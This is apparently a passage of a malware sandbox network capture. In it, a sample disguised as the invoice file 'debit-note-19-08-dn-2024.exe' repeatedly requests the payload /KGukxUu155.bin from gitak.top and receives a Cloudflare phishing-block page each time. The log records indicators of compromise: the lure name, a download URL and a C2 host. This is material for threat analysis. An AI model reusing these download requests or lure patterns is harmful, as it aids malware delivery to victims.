2024-08-26 13:34:20 UTC	541	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:34:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tqxX%2F13uaWVnLImilppCmvKcd0szd7azEzboHsYoUwg8gkOT0kV3ruDxi9YPRi%2B3qRan3x6tFb%2FgAD%2Fe6eWxr4G4t2oSHRYRu055iA93W7y6ouTKshaKT6reQmw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b9432dffdfe0a87-IAD
2024-08-26 13:34:20 UTC	828	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:34:20 UTC	1369	IN	Data Raw: 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 Data Ascii: ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert')
2024-08-26 13:34:20 UTC	1369	IN	Data Raw: 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 31 47 70 63 4d 49 47 50 74 62 79 43 67 72 5a 64 69 47 79 70 38 61 6c 59 56 31 55 70 51 4a 4c 78 78 53 55 5f 58 53 61 73 58 45 6f 2d 31 37 32 34 36 37 39 32 36 30 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 Data Ascii: <input type="hidden" name="atok" value="1GpcMIGPtbyCgrZdiGyp8alYV1UpQJLxxSU_XSasXEo-1724679260-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" s
2024-08-26 13:34:20 UTC	852	IN	Data Raw: 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 Data Ascii: r sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare
2024-08-26 13:34:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.11.20	49830	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:34:30 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:34:30 UTC	537	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:34:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R%2FArnOXvmUy99IocfGQ81ZAEoS3XvF3aJv4fBVbCD9UTtPDZijvENOq80qKZJu6aA4zVk5lJL9OSFWpxt%2FwoAfAGdMilaCsF41QzTETXdPC39YnUcemwQlQsyVc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b943321993b082f-IAD
2024-08-26 13:34:30 UTC	832	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:34:30 UTC	1369	IN	Data Raw: 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a 20 20 Data Ascii: ss" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
2024-08-26 13:34:30 UTC	1369	IN	Data Raw: 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 51 6b 4d 78 57 69 79 73 7a 38 79 38 63 71 32 44 59 49 32 79 30 42 6a 7a 32 67 54 52 59 79 42 48 56 4b 76 39 56 4e 47 75 37 59 77 2d 31 37 32 34 36 37 39 32 37 30 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 Data Ascii: nput type="hidden" name="atok" value="QkMxWiysz8y8cq2DYI2y0Bjz2gTRYyBHVKv9VNGu7Yw-1724679270-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style
2024-08-26 13:34:30 UTC	848	IN	Data Raw: 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e Data Ascii: :hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a>
2024-08-26 13:34:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.11.20	49831	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:34:40 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:34:41 UTC	539	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:34:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ec%2FIdB%2F4NudpAO6bG879Ew9RRIvJNIuFm5IyRNzihN0gU0T5mLmUZ9BiYwZo4Tv7PJwsgu9UhWZKiHIfwFTa19dtkrqRmeeb%2Fh9SoWDnAI1ee1iaq6KTcfS1QrM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b9433636ded065d-IAD
2024-08-26 13:34:41 UTC	830	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:34:41 UTC	1369	IN	Data Raw: 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 3b 0a Data Ascii: .css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert');
2024-08-26 13:34:41 UTC	1369	IN	Data Raw: 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 44 4e 67 41 6b 55 4a 48 53 67 71 30 59 76 7a 57 76 57 34 6b 4d 34 58 68 44 33 71 59 2e 4b 65 68 67 2e 47 6a 71 2e 74 54 4e 79 45 2d 31 37 32 34 36 37 39 32 38 31 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 Data Ascii: <input type="hidden" name="atok" value="DNgAkUJHSgq0YvzWvW4kM4XhD3qY.Kehg.Gjq.tTNyE-1724679281-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" sty
2024-08-26 13:34:41 UTC	850	IN	Data Raw: 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f Data Ascii: sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</
2024-08-26 13:34:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.11.20	49832	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:34:51 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
2024-08-26 13:34:51 UTC	545	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 13:34:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eeCtTfiuXXbJxRWXK%2FG9WmUKVpqNzusVDntrUIc4ZfuXZkyueMI%2BKXimqBIAPEaMso%2FF3Cqum9ZEK3Pt%2BV4Xv4DYZy%2B3NOmBW%2FXeTStJewY221znwNjQ8tSLdL4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b9433a56cbe8262-IAD
2024-08-26 13:34:51 UTC	824	IN	Data Raw: 31 31 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 113a<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-26 13:34:51 UTC	1369	IN	Data Raw: 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 Data Ascii: ors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-ale
2024-08-26 13:34:51 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 42 58 31 37 65 4b 74 66 79 46 47 66 52 75 4d 72 61 51 7a 61 30 69 55 61 71 31 63 54 52 54 72 5f 49 64 57 5a 39 6b 31 48 63 50 59 2d 31 37 32 34 36 37 39 32 39 31 2d 30 2e 30 2e 31 2e 31 2d 2f 4b 47 75 6b 78 55 75 31 35 35 2e 62 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 Data Ascii: <input type="hidden" name="atok" value="BX17eKtfyFGfRuMraQza0iUaq1cTRTr_IdWZ9k1HcPY-1724679291-0.0.1.1-/KGukxUu155.bin"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-bt
2024-08-26 13:34:51 UTC	856	IN	Data Raw: 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 Data Ascii: rator sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudf
2024-08-26 13:34:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.11.20	49833	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:35:02 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
